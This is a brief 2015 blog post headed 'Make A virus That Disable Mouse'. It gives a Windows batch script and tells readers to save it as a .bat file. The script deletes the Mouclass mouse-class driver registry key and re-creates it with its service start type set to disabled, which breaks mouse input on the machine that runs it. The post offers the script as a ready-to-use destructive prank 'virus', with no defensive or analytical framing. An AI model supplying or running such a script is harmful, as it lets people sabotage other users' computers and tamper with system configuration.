Saturday, August 15, 2015

Make A virus That Disable Mouse

Copy and pest this code in notepad
rem ---------------------------------
rem Disable Mouse
set
key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ------------------------------

now save the file as anything.bat

No comments:

Post a Comment

Comment from here.